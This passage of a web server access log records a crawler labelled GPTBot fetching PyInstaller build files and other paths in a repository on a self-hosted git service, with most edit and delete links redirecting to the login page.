[Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" +[17/Feb/2026:18:27:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" +[17/Feb/2026:18:27:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" +[17/Feb/2026:18:27:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" +[17/Feb/2026:18:27:34 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" +[17/Feb/2026:18:27:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" +[17/Feb/2026:18:27:34 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" +[17/Feb/2026:18:27:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" +[17/Feb/2026:18:27:35 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" +[17/Feb/2026:18:27:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" +[17/Feb/2026:18:27:35 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" +[17/Feb/2026:18:27:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" +[17/Feb/2026:18:27:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/PKG-00.toc" [Client 74.7.227.38] [Length 69542] [Gzip 17.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full" +[17/Feb/2026:18:27:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13366] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:18:27:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" [Client 74.7.227.38] [Length 912] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" +[17/Feb/2026:18:27:37 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" +[17/Feb/2026:18:27:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" +[17/Feb/2026:18:27:38 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" +[17/Feb/2026:18:27:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" +[17/Feb/2026:18:27:39 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" +[17/Feb/2026:18:27:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" +[17/Feb/2026:18:27:39 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/gold_monitor_full/EXE-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/EXE-00.toc" +[17/Feb/2026:18:27:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/gold_monitor_full/EXE-00.toc" +[17/Feb/2026:18:27:40 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/gold_monitor_full/EXE-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/EXE-00.toc" +[17/Feb/2026:18:27:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/gold_monitor_full/EXE-00.toc" +[17/Feb/2026:18:27:40 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" +[17/Feb/2026:18:27:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" +[17/Feb/2026:18:27:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" [Client 74.7.227.38] [Length 266046] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" +[17/Feb/2026:18:27:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" [Client 74.7.227.38] [Length 156318] [Gzip 31.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" +[17/Feb/2026:18:27:44 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/gold_monitor_full/PKG-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/PKG-00.toc" +[17/Feb/2026:18:27:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/gold_monitor_full/PKG-00.toc" +[17/Feb/2026:18:27:44 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/gold_monitor_full/PKG-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/PKG-00.toc" +[17/Feb/2026:18:27:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/gold_monitor_full/PKG-00.toc" +[17/Feb/2026:18:27:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" [Client 74.7.227.38] [Length 9814] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" +[17/Feb/2026:18:27:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/gold_monitor_full/EXE-00.toc" [Client 74.7.227.38] [Length 9814] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/EXE-00.toc" +[17/Feb/2026:18:27:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/gold_monitor_full/PKG-00.toc" [Client 74.7.227.38] [Length 9814] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/PKG-00.toc" +[17/Feb/2026:18:27:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" [Client 74.7.227.38] [Length 9817] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" +[17/Feb/2026:18:27:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/build/gold_monitor_full/PKG-00.toc" [Client 74.7.227.38] [Length 98054] [Gzip 28.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/PKG-00.toc" +[17/Feb/2026:18:27:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" [Client 74.7.227.38] [Length 58451] [Gzip 28.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" +[17/Feb/2026:18:27:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/build/gold_monitor_full/EXE-00.toc" [Client 74.7.227.38] [Length 99212] [Gzip 28.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/EXE-00.toc" +[17/Feb/2026:18:27:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/gold_monitor_full/EXE-00.toc" [Client 74.7.227.38] [Length 902] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/EXE-00.toc" +[17/Feb/2026:18:27:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" +[17/Feb/2026:18:27:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" +[17/Feb/2026:18:27:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" +[17/Feb/2026:18:27:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" +[17/Feb/2026:18:27:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" [Client 74.7.227.38] [Length 92594] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" +[17/Feb/2026:18:27:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" [Client 74.7.227.38] [Length 902] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" +[17/Feb/2026:18:27:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/gold_monitor_full/EXE-00.toc" [Client 74.7.227.38] [Length 154941] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/EXE-00.toc" +[17/Feb/2026:18:27:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/gold_monitor_full/PKG-00.toc" [Client 74.7.227.38] [Length 153194] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/PKG-00.toc" +[17/Feb/2026:18:27:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/gold_monitor_full/PKG-00.toc" [Client 74.7.227.38] [Length 902] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/PKG-00.toc" +[17/Feb/2026:18:27:56 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/gold_monitor_full/PKG-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/build/gold_monitor_full/PKG-00.toc" +[17/Feb/2026:18:27:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/gold_monitor_full/PKG-00.toc" +[17/Feb/2026:18:27:56 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" +[17/Feb/2026:18:27:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" +[17/Feb/2026:18:27:57 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/gold_monitor_full/EXE-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/build/gold_monitor_full/EXE-00.toc" +[17/Feb/2026:18:27:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/gold_monitor_full/EXE-00.toc" +[17/Feb/2026:18:27:57 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" +[17/Feb/2026:18:27:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" +[17/Feb/2026:18:27:58 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/build/gold_monitor_full/PKG-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/build/gold_monitor_full/PKG-00.toc" +[17/Feb/2026:18:27:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/build/gold_monitor_full/PKG-00.toc" +[17/Feb/2026:18:27:58 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/build/gold_monitor_full/EXE-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/build/gold_monitor_full/EXE-00.toc" +[17/Feb/2026:18:27:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr 